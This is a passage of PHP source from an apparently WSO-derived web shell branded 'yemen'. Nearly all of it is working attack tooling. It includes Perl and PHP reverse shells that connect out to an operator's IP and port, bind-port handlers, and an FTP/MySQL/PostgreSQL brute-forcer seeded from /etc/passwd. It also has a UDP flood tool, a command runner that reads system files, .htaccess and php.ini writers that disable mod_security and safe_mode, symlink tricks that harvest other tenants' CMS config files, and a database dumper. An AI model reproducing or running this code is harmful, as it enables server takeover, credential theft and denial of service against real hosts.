<span>Back-connect to</span><br/> <font color="green">
Server: <input type='text' name='server' value='
<?php echo $_SERVER['REMOTE_ADDR']
?>'> Port: <input type='text' name='port' value='31337'> Using: <select name="using"><option value='bcc'>C</option><option value='bcp'>Perl</option></select> <input type=submit s s value=">>">
</font></form><br>
<?php if (isset($_POST['p1'])) { function cf($f, $t) { $w = @fopen($f, "w") or @function_exists('file_put_contents');
if ($w) { @fwrite($w, base64_decode($t)) or @fputs($w, base64_decode($t)) or @file_put_contents($f, base64_decode($t));
@fclose($w);
} } if ($_POST['p1'] == 'bpc') { cf("/tmp/bp.c", $bind_port_c);
$out = ex("gcc -o /tmp/bp /tmp/bp.c");
@unlink("/tmp/bp.c");
$out.= ex("/tmp/bp " . $_POST['p2'] . " " . $_POST['p3'] . " &");
echo "<pre class=ml1>$out
" . ex("ps aux | grep bp") . "</pre>";
} if ($_POST['p1'] == 'bpp') { cf("/tmp/bp.pl", $bind_port_p);
$out = ex(which("perl") . " /tmp/bp.pl " . $_POST['p2'] . " &");
echo "<pre class=ml1>$out
" . ex("ps aux | grep bp.pl") . "</pre>";
} if ($_POST['p1'] == 'bcc') { cf("/tmp/bc.c", $back_connect_c);
$out = ex("gcc -o /tmp/bc /tmp/bc.c");
@unlink("/tmp/bc.c");
$out.= ex("/tmp/bc " . $_POST['p2'] . " " . $_POST['p3'] . " &");
echo "<pre class=ml1>$out
" . ex("ps aux | grep bc") . "</pre>";
} if ($_POST['p1'] == 'bcp') { cf("/tmp/bc.pl", $back_connect_p);
$out = ex(which("perl") . " /tmp/bc.pl " . $_POST['p2'] . " " . $_POST['p3'] . " &");
echo "<pre class=ml1>$out
" . ex("ps aux | grep bc.pl") . "</pre>";
} } echo '</div>';
yemenfooter();
} function yemenhash() { if (!function_exists('hex2bin')) { function hex2bin($p) { return decbin(hexdec($p));
} } if (!function_exists('binhex')) { function binhex($p) { return dechex(bindec($p));
} } if (!function_exists('hex2ascii')) { function hex2ascii($p) { $r = '';
for ($i = 0;
$i < strLen($p);
$i+= 2) { $r.= chr(hexdec($p[$i] . $p[$i + 1]));
} return $r;
} } if (!function_exists('ascii2hex')) { function ascii2hex($p) { $r = '';
for ($i = 0;
$i < strlen($p);
++$i) $r.= sprintf('%02X', ord($p[$i]));
return strtoupper($r);
} } if (!function_exists('full_urlencode')) { function full_urlencode($p) { $r = '';
for ($i = 0;
$i < strlen($p);
++$i) $r.= '%' . dechex(ord($p[$i]));
return strtoupper($r);
} } $stringTools = array( 'base64_encode()' => 'base64_encode', 'base64_decode()' => 'base64_decode', 'md5()' => 'md5', 'sha1()' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'url_encode()' => 'urlencode', 'url decode()' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'htmlspecialchars()' => 'htmlspecialchars', );
yemenhead();
echo '<div class=header>';
if (empty($_POST['ajax']) && !empty($_POST['p1'])) $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = false;
echo "<form onSubmit='g(null,null,this.selectTool.value,this.input.value);
return false;
'><select name='selectTool'>";
foreach ($stringTools as $k => $v) echo "<option value='" . htmlspecialchars($v) . "'>" . $k . "</option>";
echo "</select><input type='submit' value='>>'/><br><textarea name='input' style='margin-top:5px' class=bigarea>" . (empty($_POST['p1']) ? '' : htmlspecialchars(@$_POST['p2'])) . "</textarea></form><pre class='ml1' style='" . (empty($_POST['p1']) ? 'display:none;
' : '') . "margin-top:5px' id='strOutput'>";
if (!empty($_POST['p1'])) { if (in_array($_POST['p1'], $stringTools)) echo htmlspecialchars($_POST['p1']($_POST['p2']));
} echo "</div>";
yemenFooter();
} function yemenbruteftp() { yemenhead();
if (isset($_POST['proto'])) { echo '<h1>Results</h1><div class=content><span>Type:</span> ' . htmlspecialchars($_POST['proto']) . ' <span>Server:</span> ' . htmlspecialchars($_POST['server']) . '<br>';
if ($_POST['proto'] == 'ftp') { function bruteForce($ip, $port, $login, $pass) { $fp = @ftp_connect($ip, $port ? $port : 21);
if (!$fp) return false;
$res = @ftp_login($fp, $login, $pass);
@ftp_close($fp);
return $res;
} } elseif ($_POST['proto'] == 'mysql') { function bruteForce($ip, $port, $login, $pass) { $res = @mysql_connect($ip . ':' . $port ? $port : 3306, $login, $pass);
@mysql_close($res);
return $res;
} } elseif ($_POST['proto'] == 'pgsql') { function bruteForce($ip, $port, $login, $pass) { $str = "host='" . $ip . "' port='" . $port . "' user='" . $login . "' password='" . $pass . "' dbname=''";
$res = @pg_connect($server[0] . ':' . $server[1] ? $server[1] : 5432, $login, $pass);
@pg_close($res);
return $res;
} } $success = 0;
$attempts = 0;
$server = explode(":", $_POST['server']);
if ($_POST['type'] == 1) { $temp = @file('/etc/passwd');
if (is_array($temp)) foreach ($temp as $line) { $line = explode(":", $line);
++$attempts;
if (bruteForce(@$server[0], @$server[1], $line[0], $line[0])) { $success++;
echo '<b>' . htmlspecialchars($line[0]) . '</b>:' . htmlspecialchars($line[0]) . '<br>';
} if (@$_POST['reverse']) { $tmp = "";
for ($i = strlen($line[0]) - 1;
$i >= 0;
--$i) $tmp.= $line[0][$i];
++$attempts;
if (bruteForce(@$server[0], @$server[1], $line[0], $tmp)) { $success++;
echo '<b>' . htmlspecialchars($line[0]) . '</b>:' . htmlspecialchars($tmp);
} } } } elseif ($_POST['type'] == 2) { $temp = @file($_POST['dict']);
if (is_array($temp)) foreach ($temp as $line) { $line = trim($line);
++$attempts;
if (bruteForce($server[0], @$server[1], $_POST['login'], $line)) { $success++;
echo '<b>' . htmlspecialchars($_POST['login']) . '</b>:' . htmlspecialchars($line) . '<br>';
} } } echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
} echo '<h1><font color=yellow >FTP bruteforce</font></h1><div class=content><table><form method=post><tr><td><span>Type</span></td>' . '<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>' . '<input type=hidden name=c value="' . htmlspecialchars($GLOBALS['cwd']) . '">' . '<input type=hidden name=a value="' . htmlspecialchars($_POST['a']) . '">' . '<input type=hidden name=charset value="' . htmlspecialchars($_POST['charset']) . '">' . '<span>Server:port</span></td>' . '<td><input type=text name=server value="127.0.0.1"></td></tr>' . '<tr><td><span>Brute type</span></td>' . '><td><label><font color=white> <input type=radio name=type value="1" checked> /etc/passwd</font></label></td></tr>' . '<tr><td></td><td><label style="padding-left:15px"><font color=white><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>' . '<tr><td></td><td><label><font color=white><input type=radio name=type value="2"> Dictionary</font></label></td></tr>' . '<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>' . '<td><input type=text name=login value="Yemen"></td></tr>' . '<tr><td><span>Dictionary</span></td>' . '<td><input type=text name=dict value="' . htmlspecialchars($GLOBALS['cwd']) . 'passwd.dic"></td></tr></table>' . '</td></tr><tr><td></td><td><input type=submit s s value=">>"></td></tr></form></table>';
echo '</div><br>';
yemenFooter();
} function yemendos() { yemenhead();
echo '<div class=header>';
if (empty($_POST['ajax']) && !empty($_POST['p1'])) $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = false;
echo '<center><span>| UDP DOSSIER |</span><br><br><form onSubmit="g(null,null,this.udphost.value,this.udptime.value,this.udpport.value);
return false;
" method=POST><span>Host :</span><input name="udphost" type="text" size="25" /><span>Time :</span><input name="udptime" type="text" size="15" /><span>Port :</span><input name="udpport" type="text" size="10" /><input type="submit" value=">>" /></form></center>';
echo "<pre class='ml1' style='" . (empty($_POST['p1']) ? 'display:none;
' : '') . "margin-top:5px' >";
if (!empty($_POST['p1']) && !empty($_POST['p2']) && !empty($_POST['p3'])) { $packets = 0;
ignore_user_abort(true);
$exec_time = $_POST['p2'];
$time = time();
$max_time = $exec_time + $time;
$host = $_POST['p1'];
$portudp = $_POST['p3'];
for ($i = 0;
$i < 65000;
$i++) { $out.= 'X';
} while (1) { $packets++;
if (time() > $max_time) { break;
} $fp = fsockopen('udp://' . $host, $portudp, $errno, $errstr, 5);
if ($fp) { fwrite($fp, $out);
fclose($fp);
} } echo "$packets (" . round(($packets * 65) / 1024, 2) . " MB) packets averaging " . round($packets / $exec_time, 2) . " packets per second";
echo "</pre>";
} echo '</div>';
yemenfooter();
} function yemenproc() { yemenhead();
echo "<Div class=header>";
if (empty($_POST['ajax']) && !empty($_POST['p1'])) $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = false;
if ($GLOBALS['sys'] == "win") { $process = array( "System Info" => "systeminfo", "Active Connections" => "netstat -an", "Running Services" => "net start", "User Accounts" => "net user", "Show Computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" );
} else { $process = array( "Process status" => "ps aux", "Syslog" => "cat /etc/syslog.conf", "Resolv" => "cat /etc/resolv.conf", "Hosts" => "cat /etc/hosts", "Passwd" => "cat /etc/passwd", "Cpuinfo" => "cat /proc/cpuinfo", "Version" => "cat /proc/version", "Sbin" => "ls -al /usr/sbin", "Interrupts" => "cat /proc/interrupts", "lsattr" => "lsattr -va", "Uptime" => "uptime", "Fstab" => "cat /etc/fstab", "HDD Space" => "df -h" );
} if (!empty($_POST['p1'])) { echo "<form onsubmit=\"Encoder2('encod2');
g('proc',null,this.c.value);
return false;
\"><center><font style='color:red;
width:blod;
font-size:16px;
font-family:auto;
'>~= Terminal Mod =~</font></center><input class=\"toolsInp\" type=text style='width:92.5%;
padding:2px;
margin:2px;
color:white;
' autocomplete=ON id=encod2 name=c value='' autofocus><input style='width:5%;
padding:1px;
' type=submit value=\">>\"></form>
<div padding=1px ><textarea class='ml1' style='height:400px;
width:98%;
margin-top:5px;
margin-bottom:10px;
border: 1px solid red;
' >";
echo yemenEx($_POST['p1']);
echo '</textarea></div>
<hr>
';
} echo "<center>";
foreach ($process as $n => $link) { echo '<a href="#" onclick="g(null,null,\'' . base64_encode($link) . '\')"> | <b>' . $n . '</b> | </a></br></br>';
} echo "</center>";
echo "</div>";
yemenfooter();
} function yemensafe() { yemenhead();
echo "<div class=header><center><h3><span>| SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS |</span></h3>Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh ] files create in following dir<br>| " . $GLOBALS['cwd'] . " |<br>";
echo '<a href=# onclick="g(null,null,\'php.ini\',null)">| PHP.INI | </a><a href=# onclick="g(null,null,null,\'ini\')">| .htaccess(Mod) | </a><a href=# onclick="g(null,null,null,null,\'sh\')">| .htaccess(perl) | </a></center>';
if (!empty($_POST['p2']) && isset($_POST['p2'])) { $fil = fopen($GLOBALS['cwd'] . ".htaccess", "w");
fwrite($fil, '<IfModule mod_security.c>
Sec------Engine Off
Sec------ScanPOST Off
</IfModule>');
fclose($fil);
} if (!empty($_POST['p1']) && isset($_POST['p1'])) { $fil = fopen($GLOBALS['cwd'] . "php.ini", "w");
fwrite($fil, 'safe_mode=OFF
disable_functions=NONE');
fclose($fil);
} if (!empty($_POST['p3']) && isset($_POST['p3'])) { $fil = fopen($GLOBALS['cwd'] . ".htaccess", "w");
fwrite($fil, 'Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .sh
AddHandler cgi-script .pl
AddHandler cgi-script .pl');
fclose($fil);
} echo "<br></div>";
yemenfooter();
} function yemenconnect() { yemenhead();
$back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
echo "<div class=header><center><h3><span>| PERL AND PHP(threads) BACK CONNECT |</span></h3>";
echo "<form onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);
return false;
\"><span>PERL BACK CONNECT</span><br>IP: <input type='text' name='server' value='" . $_SERVER['REMOTE_ADDR'] . "'> Port: <input type='text' name='port' value='443'> <input type=submit value='>>'></form>";
echo "<br><form onSubmit=\"g(null,null,'php',this.server.value,this.port.value);
return false;
\"><span>PHP BACK CONNECT</span><br>IP: <input type='text' name='server' value='" . $_SERVER['REMOTE_ADDR'] . "'> Port: <input type='text' name='port' value='443'> <input type=submit value='>>'></form></center>";
if (isset($_POST['p1'])) { function cf($f, $t) { $w = @fopen($f, "w") or @function_exists('file_put_contents');
if ($w) { @fwrite($w, base64_decode($t));
@fclose($w);
} } if ($_POST['p1'] == 'bcp') { cf("/tmp/bc.pl", $back_connect_p);
$out = yemenEx("perl /tmp/bc.pl " . $_POST['p2'] . " " . $_POST['p3'] . " 1>/dev/null 2>&1 &");
echo "<pre class=ml1 style='margin-top:5px'>Successfully opened reverse shell to " . $_POST['p2'] . ":" . $_POST['p3'] . "<br>Connecting...</pre>";
@unlink("/tmp/bc.pl");
} if ($_POST['p1'] == 'php') { @set_time_limit(0);
$ip = $_POST['p2'];
$port = $_POST['p3'];
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a;
w;
id;
/bin/sh -i';
$daemon = 0;
$debug = 0;
echo "<pre class=ml1 style='margin-top:5px'>";
if (function_exists('pcntl_fork')) { $pid = pcntl_fork();
if ($pid == - 1) { echo "Cant fork!<br>";
exit(1);
} if ($pid) { exit(0);
} if (posix_setsid() == - 1) { echo "Error: Can't setsid()<br>";
exit(1);
} $daemon = 1;
} else { echo "WARNING: Failed to daemonise. This is quite common and not fatal<br>";
} chdir("/");
umask(0);
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) { echo "$errstr ($errno)";
exit(1);
} $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) { echo "ERROR: Can't spawn shell<br>";
exit(1);
} @stream_set_blocking($pipes[0], 0);
@stream_set_blocking($pipes[1], 0);
@stream_set_blocking($pipes[2], 0);
@stream_set_blocking($sock, 0);
echo "Successfully opened reverse shell to $ip:$port<br>";
while (1) { if (feof($sock)) { echo "ERROR: Shell connection terminated<br>";
break;
} if (feof($pipes[1])) { echo "ERROR: Shell process terminated<br>";
break;
} $read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = @stream_select($read_a, $write_a, $error_a, null);
if (in_array($sock, $read_a)) { if ($debug) echo "SOCK READ<br>";
$input = fread($sock, $chunk_size);
if ($debug) echo "SOCK: $input<br>";
fwrite($pipes[0], $input);
} if (in_array($pipes[1], $read_a)) { if ($debug) echo "STDOUT READ<br>";
$input = fread($pipes[1], $chunk_size);
if ($debug) echo "STDOUT: $input<br>";
fwrite($sock, $input);
} if (in_array($pipes[2], $read_a)) { if ($debug) echo "STDERR READ<br>";
$input = fread($pipes[2], $chunk_size);
if ($debug) echo "STDERR: $input<br>";
fwrite($sock, $input);
} } fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
echo "</pre>";
} } echo "</div>";
yemenfooter();
} function yemenyemen() { yemenhead();
echo "<div style='height:100%;
width:100%;
border: 2px solid #5BEEFF;
padding-top:20px;
' ><center><b><font color=white size=4 face=Georgia, Arial>Upgrade By 3Turr</br>Old version Developed by Monds & hatrk <br>respect the coders ^_^</font></b></center>";
yemenfooter();
} function yemensymlink() { yemenhead();
$IIIIIIIIIIIl = 'http://' . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
$IIIIIIIIIII1 = explode('/', $IIIIIIIIIIIl);
$IIIIIIIIIIIl = str_replace($IIIIIIIIIII1[count($IIIIIIIIIII1) - 1], '', $IIIIIIIIIIIl);
echo '<div class=header><script>p1_=p2_=p3_="";
</script><br><center><h3><a href=# onclick="g(\'symlink\',null,\'website\',null)">| Domains |</br> </a><a href=# onclick="g(\'symlink\',null,null,\'whole\')">| ls -n /sym| </br></a><a href=# onclick="g(\'symlink\',null,null,null,\'config\')">| Config PHP symlink | </a></h3></center>';
if (isset($_POST['p1']) && $_POST['p1'] == 'website') { echo "<center>";
$d0mains = @file("/etc/named.conf");
if (!$d0mains) { echo "<pre class=ml1 style='margin-top:5px'>Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
} echo "<table align=center class='main' border=0 >
<tr bgcolor=Red><td>Count</td><td>domains</td><td>users</td></tr>";
$count = 1;
foreach ($d0mains as $d0main) { if (@eregi("zone", $d0main)) { preg_match_all('#zone "(.*)"#', $d0main, $domains);
flush();
if (strlen(trim($domains[1][0])) > 2) { $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domains[1][0]));
echo "<tr><td>" . $count . "</td><td><a href=http://www." . $domains[1][0] . "/>" . $domains[1][0] . "</a></td><td>" . $user['name'] . "</td></tr>";
flush();
$count++;
} } } echo "</center></table>";
} if (isset($_POST['p2']) && $_POST['p2'] == 'whole') { @set_time_limit(0);
echo "<center>";
@mkdir('sym', 0777);
$IIIIIIIIIIl1 = "Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any";
$IIIIIIIIII1I = @fopen('sym/.htaccess', 'w');
fwrite($IIIIIIIIII1I, $IIIIIIIIIIl1);
@symlink('/', 'sym/root');
$IIIIIIIIIlIl = basename('_FILE_');
$IIIIIIIIIllI = @file('/etc/named.conf');
if (!$IIIIIIIIIllI) { echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
} else { echo "<table align='center' width='40%' class='main'><td>Domains</td><td>Users</td><td>symlink </td>";
foreach ($IIIIIIIIIllI as $IIIIIIIIIll1) { if (@eregi('zone', $IIIIIIIIIll1)) { preg_match_all('#zone "(.*)"#', $IIIIIIIIIll1, $IIIIIIIIIl11);
flush();
if (strlen(trim($IIIIIIIIIl11[1][0])) > 2) { $IIIIIIIII1I1 = posix_getpwuid(@fileowner('/etc/valiases/' . $IIIIIIIIIl11[1][0]));
$IIIIIIII1I1l = $IIIIIIIII1I1['name'];
@symlink('/', 'sym/root');
$IIIIIIII1I1l = $IIIIIIIIIl11[1][0];
$IIIIIIII1I11 = '\.ir';
$IIIIIIII1lII = '\.il';
if (@eregi("$IIIIIIII1I11", $IIIIIIIIIl11[1][0]) or @eregi("$IIIIIIII1lII", $IIIIIIIIIl11[1][0])) { $IIIIIIII1I1l = "<div style=' color: #FF0000 ;
text-shadow: 0px 0px 1px red;
'>" . $IIIIIIIIIl11[1][0] . '</div>';
} echo "
<tr>
<td>
<a target='_blank' href=http://www." . $IIIIIIIIIl11[1][0] . '/>' . $IIIIIIII1I1l . ' </a>
</td>
<td>
' . $IIIIIIIII1I1['name'] . "
</td>
<td>
<a href='sym/root/home/" . $IIIIIIIII1I1['name'] . "/public_html' target='_blank'>symlink </a>
</td>
</tr>";
flush();
} } } } echo "</center></table>";
} if (isset($_POST['p3']) && $_POST['p3'] == 'config') { echo "<center>";
@mkdir('sym', 0777);
$IIIIIIIIIIl1 = "Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any";
$IIIIIIIIII1I = @fopen('sym/.htaccess', 'w');
@fwrite($IIIIIIIIII1I, $IIIIIIIIIIl1);
@symlink('/', 'sym/root');
$IIIIIIIIIlIl = basename('_FILE_');
$IIIIIIIIIllI = @file('/etc/named.conf');
if (!$IIIIIIIIIllI) { echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
} else { echo "
<table align='center' width='40%' class='main' ><td> Domains </td><td> Script </td>";
foreach ($IIIIIIIIIllI as $IIIIIIIIIll1) { if (@eregi('zone', $IIIIIIIIIll1)) { preg_match_all('#zone "(.*)"#', $IIIIIIIIIll1, $IIIIIIIIIl11);
flush();
if (strlen(trim($IIIIIIIIIl11[1][0])) > 2) { $IIIIIIIII1I1 = posix_getpwuid(@fileowner('/etc/valiases/' . $IIIIIIIIIl11[1][0]));
$IIIIIIIII1l1 = $IIIIIIIIIIIl . '/sym/root/home/' . $IIIIIIIII1I1['name'] . '/public_html/wp-config.php';
$IIIIIIIII11I = get_headers($IIIIIIIII1l1);
$IIIIIIIII11l = $IIIIIIIII11I[0];
$IIIIIIIII111 = $IIIIIIIIIIIl . '/sym/root/home/' . $IIIIIIIII1I1['name'] . '/public_html/blog/wp-config.php';
$IIIIIIIIlIII = get_headers($IIIIIIIII111);
$IIIIIIIIlIIl = $IIIIIIIIlIII[0];
$IIIIIIIIlII1 = $IIIIIIIIIIIl . '/sym/root/home/' . $IIIIIIIII1I1['name'] . '/public_html/configuration.php';
$IIIIIIIIlIlI = get_headers($IIIIIIIIlII1);
$IIIIIIIIlIll = $IIIIIIIIlIlI[0];
$IIIIIIIIlIl1 = $IIIIIIIIIIIl . '/sym/root/home/' . $IIIIIIIII1I1['name'] . '/public_html/joomla/configuration.php';
$IIIIIIIIlI1I = get_headers($IIIIIIIIlIl1);
$IIIIIIIIlI1l = $IIIIIIIIlI1I[0];
$IIIIIIIIlI11 = $IIIIIIIIIIIl . '/sym/root/home/' . $IIIIIIIII1I1['name'] . '/public_html/includes/config.php';
$IIIIIIIIllII = get_headers($IIIIIIIIlI11);
$IIIIIIIIllIl = $IIIIIIIIllII[0];
$IIIIIIIIllI1 = $IIIIIIIIIIIl . '/sym/root/home/' . $IIIIIIIII1I1['name'] . '/public_html/vb/includes/config.php';
$IIIIIIIIlllI = get_headers($IIIIIIIIllI1);
$IIIIIIIIllll = $IIIIIIIIlllI[0];
$IIIIIIIIlll1 = $IIIIIIIIIIIl . '/sym/root/home/' . $IIIIIIIII1I1['name'] . '/public_html/forum/includes/config.php';
$IIIIIIIIll1I = get_headers($IIIIIIIIlll1);
$IIIIIIIIll1l = $IIIIIIIIll1I[0];
$IIIIIIIIll11 = $IIIIIIIIIIIl . '/sym/root/home/' . $IIIIIIIII1I1['name'] . 'public_html/clients/configuration.php';
$IIIIIIIIl1II = get_headers($IIIIIIIIll11);
$IIIIIIIIl1Il = $IIIIIIIIl1II[0];
$IIIIIIIIl1I1 = $IIIIIIIIIIIl . '/sym/root/home/' . $IIIIIIIII1I1['name'] . '/public_html/support/configuration.php';
$IIIIIIIIl1II = get_headers($IIIIIIIIl1I1);
$IIIIIIIIl1lI = $IIIIIIIIl1II[0];
$IIIIIIIIl1ll = $IIIIIIIIIIIl . '/sym/root/home/' . $IIIIIIIII1I1['name'] . '/public_html/client/configuration.php';
$IIIIIIIIl1l1 = get_headers($IIIIIIIIl1ll);
$IIIIIIIIl11I = $IIIIIIIIl1l1[0];
$IIIIIIIIl11l = $IIIIIIIIIIIl . '/sym/root/home/' . $IIIIIIIII1I1['name'] . '/public_html/submitticket.php';
$IIIIIIIIl111 = get_headers($IIIIIIIIl11l);
$IIIIIIII1III = $IIIIIIIIl111[0];
$IIIIIIII1IIl = $IIIIIIIIIIIl . '/sym/root/home/' . $IIIIIIIII1I1['name'] . '/public_html/client/configuration.php';
$IIIIIIII1II1 = get_headers($IIIIIIII1IIl);
$IIIIIIII1IlI = $IIIIIIII1II1[0];
$IIIIIIII1Ill = strpos($IIIIIIIII11l, '200');
$IIIIIIII1I1I = '
';
if (strpos($IIIIIIIII11l, '200') == true) { $IIIIIIII1I1I = "<a href='" . $IIIIIIIII1l1 . "' target='_blank'>Wordpress</a>";
} elseif (strpos($IIIIIIIIlIIl, '200') == true) { $IIIIIIII1I1I = "<a href='" . $IIIIIIIII111 . "' target='_blank'>Wordpress</a>";
} elseif (strpos($IIIIIIIIlIll, '200') == true and strpos($IIIIIIII1III, '200') == true) { $IIIIIIII1I1I = " <a href='" . $IIIIIIIIl11l . "' target='_blank'>WHMCS</a>";
} elseif (strpos($IIIIIIIIl1lI, '200') == true) { $IIIIIIII1I1I = " <a href='" . $IIIIIIIIl1I1 . "' target='_blank'>WHMCS</a>";
} elseif (strpos($IIIIIIIIl11I, '200') == true) { $IIIIIIII1I1I = " <a href='" . $IIIIIIIIl1ll . "' target='_blank'>WHMCS</a>";
} elseif (strpos($IIIIIIIIlIll, '200') == true) { $IIIIIIII1I1I = " <a href='" . $IIIIIIIIlII1 . "' target='_blank'>Joomla</a>";
} elseif (strpos($IIIIIIIIlI1l, '200') == true) { $IIIIIIII1I1I = " <a href='" . $IIIIIIIIlIl1 . "' target='_blank'>Joomla</a>";
} elseif (strpos($IIIIIIIIllIl, '200') == true) { $IIIIIIII1I1I = " <a href='" . $IIIIIIIIlI11 . "' target='_blank'>vBulletin</a>";
} elseif (strpos($IIIIIIIIllll, '200') == true) { $IIIIIIII1I1I = " <a href='" . $IIIIIIIIllI1 . "' target='_blank'>vBulletin</a>";
} elseif (strpos($IIIIIIIIll1l, '200') == true) { $IIIIIIII1I1I = " <a href='" . $IIIIIIIIlll1 . "' target='_blank'>vBulletin</a>";
} else { continue;
} $IIIIIIII1I1l = $IIIIIIIII1I1['name'];
echo '<tr><td><a href=http://www.' . $IIIIIIIIIl11[1][0] . '/>' . $IIIIIIIIIl11[1][0] . '</a></td>
<td>' . $IIIIIIII1I1I . '</td></tr>';
flush();
} } } } echo "</center></table>";
} echo "</div>";
yemenfooter();
} function yemensql() { class DbClass { var $type;
var $link;
var $res;
function DbClass($type) { $this->type = $type;
} function connect($host, $user, $pass, $dbname) { switch ($this->type) { case 'mysql': if ($this->link = @mysql_connect($host, $user, $pass, true)) return true;
break;
case 'pgsql': $host = explode(':', $host);
if (!$host[1]) $host[1] = 5432;
if ($this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname")) return true;
break;
} return false;
} function selectdb($db) { switch ($this->type) { case 'mysql': if (@mysql_select_db($db)) return true;
break;
} return false;
} function query($str) { switch ($this->type) { case 'mysql': return $this->res = @mysql_query($str);
break;
case 'pgsql': return $this->res = @pg_query($this->link, $str);
break;
} return false;
} function fetch() { $res = func_num_args() ? func_get_arg(0) : $this->res;
switch ($this->type) { case 'mysql': return @mysql_fetch_assoc($res);
break;
case 'pgsql': return @pg_fetch_assoc($res);
break;
} return false;
} function listDbs() { switch ($this->type) { case 'mysql': return $this->query("SHOW databases");
break;
case 'pgsql': return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
break;
} return false;
} function listTables() { switch ($this->type) { case 'mysql': return $this->res = $this->query('SHOW TABLES');
break;
case 'pgsql': return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
break;
} return false;
} function error() { switch ($this->type) { case 'mysql': return @mysql_error();
break;
case 'pgsql': return @pg_last_error();
break;
} return false;
} function setCharset($str) { switch ($this->type) { case 'mysql': if (function_exists('mysql_set_charset')) return @mysql_set_charset($str, $this->link);
else $this->query('SET CHARSET ' . $str);
break;
case 'pgsql': return @pg_set_client_encoding($this->link, $str);
break;
} return false;
} function loadFile($str) { switch ($this->type) { case 'mysql': return $this->fetch($this->query("SELECT LOAD_FILE('" . addslashes($str) . "') as file"));
break;
case 'pgsql': $this->query("CREATE TABLE wso2(file text);
COPY wso2 FROM '" . addslashes($str) . "';
select file from wso2;
");
$r = array();
while ($i = $this->fetch()) $r[] = $i['file'];
$this->query('drop table wso2');
return array('file' => implode("
", $r));
break;
} return false;
} function dump($table, $fp = false) { switch ($this->type) { case 'mysql': $res = $this->query('SHOW CREATE TABLE `' . $table . '`');
$create = mysql_fetch_array($res);
$sql = $create[1] . ";
";
if ($fp) fwrite($fp, $sql);
else echo ($sql);
$this->query('SELECT * FROM `' . $table . '`');
$head = true;
while ($item = $this->fetch()) { $columns = array();
foreach ($item as $k => $v) { if ($v == null) $item[$k] = "NULL";
elseif (is_numeric($v)) $item[$k] = $v;
else $item[$k] = "'" . @mysql_real_escape_string($v) . "'";
$columns[] = "`" . $k . "`";
} if ($head) { $sql = 'INSERT INTO `' . $table . '` (' . implode(", ", $columns) . ") VALUES
(" . implode(", ", $item) . ')';
$head = false;
} else $sql = "
,(" . implode(", ", $item) . ')';
if ($fp) fwrite($fp, $sql);
else echo ($sql);
} if (!$head) if ($fp) fwrite($fp, ";
");
else echo (";
");
break;
case 'pgsql': $this->query('SELECT * FROM ' . $table);
while ($item = $this->fetch()) { $columns = array();
foreach ($item as $k => $v) { $item[$k] = "'" . addslashes($v) . "'";
$columns[] = $k;
} $sql = 'INSERT INTO ' . $table . ' (' . implode(", ", $columns) . ') VALUES (' . implode(", ", $item) . ');
' . "
";
if ($fp) fwrite($fp, $sql);
else echo ($sql);
} break;
} return false;
} };
$db = new DbClass($_POST['type']);
if (@$_POST['p2'] == 'download') { $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
$db->selectdb($_POST['sql_base']);
switch ($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251');
break;
case "UTF-8": $db->setCharset('utf8');
